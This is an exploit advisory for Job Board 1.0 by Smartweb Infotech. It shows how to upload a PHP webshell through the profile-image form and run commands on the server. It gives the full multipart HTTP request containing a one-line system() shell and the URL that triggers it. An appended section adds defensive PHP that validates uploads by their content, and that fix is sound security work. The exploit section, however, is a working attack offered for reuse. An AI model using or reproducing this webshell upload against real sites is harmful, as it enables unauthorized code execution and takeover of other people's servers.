Job Board 1.0 Shell Upload
Job Board version 1.0 suffers from a remote shell upload vulnerability.
CraCkEr
THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : https://demo.smartwebinfotech.site/job-board/
Vendor    : Smartweb Infotech
Software  : Job Board 1.0 - Job Portal Management System
Vuln Type : Arbitrary File Upload Leads to RCE
Impact    : Upload PHPshell and execute commands on the server

Release Notes:
═════════════

Allow Attacker to overwrite critical files simply by uploading a shell and execute commands on the server

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

## Steps to Reproduce:

1. Go to [My Profile] on this Path (https://website/settings/account)

2. Upload any Image to capture the request in Burp Suite

3. Replace image.png to upload.php in [filename] and add this simple phpshell

POST /job-board/settings/account HTTP/2

-----------------------------427088175318086545183087924022
Content-Disposition: form-data; name="profile"; filename="shell.php"
Content-Type: image/png

<?php echo system($_GET['command']); ?>
-----------------------------427088175318086545183087924022--

4. Send the Request

5. Back to the Path (https://website/settings/account)

6. Refresh the Page

7. Copy the Link of (Unloaded Image)

8. Paste the Link of your uploaded PHPshell - Path (https://website/storage/upload/profile/shell_1687559183.php?command=id)

9. RCE Executed!

[-] Done
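
The request above is stored with the client-supplied .php extension even though its Content-Type says image/png, so both fields are attacker-controlled. As a defender's counterpart, here is an added PHP example (not the vendor's code and not part of the original advisory) that derives the stored name from the file's bytes instead. The function name, the allow-list and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example, not the vendor's code. All names here are hypothetical.
// Allow-list: content-detected MIME type => extension the server will use.
const ALLOWED_IMAGE_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Returns a server-chosen file name for an accepted image, or null to reject.
 * $clientName and $clientType are taken only to show that they are ignored.
 */
function stored_name_for_upload(string $tmpPath, string $clientName, string $clientType): ?string
{
    // Detect the MIME type from the content, not from the request headers.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected === false || !isset(ALLOWED_IMAGE_TYPES[$detected])) {
        return null;
    }
    // The file must also parse as an image of that same type.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== $detected) {
        return null;
    }
    // Random base name plus an extension taken from the allow-list only,
    // so nothing from the client-supplied filename reaches the disk.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$detected];
}

// Constructed sample 1: non-image body, client claims shell.php / image/png.
$fake = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($fake, "<?php /* constructed non-image body */ ?>");

// Constructed sample 2: a real 1x1 GIF sent under a .php name.
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));

var_dump(stored_name_for_upload($fake, 'shell.php', 'image/png'));
var_dump(stored_name_for_upload($gif, 'avatar.php', 'image/gif'));

unlink($fake);
unlink($gif);
```

Content sniffing alone does not stop an image that has script text appended, so the server-chosen extension is the part that matters. The upload directory should also be configured so that the web server never executes scripts from it.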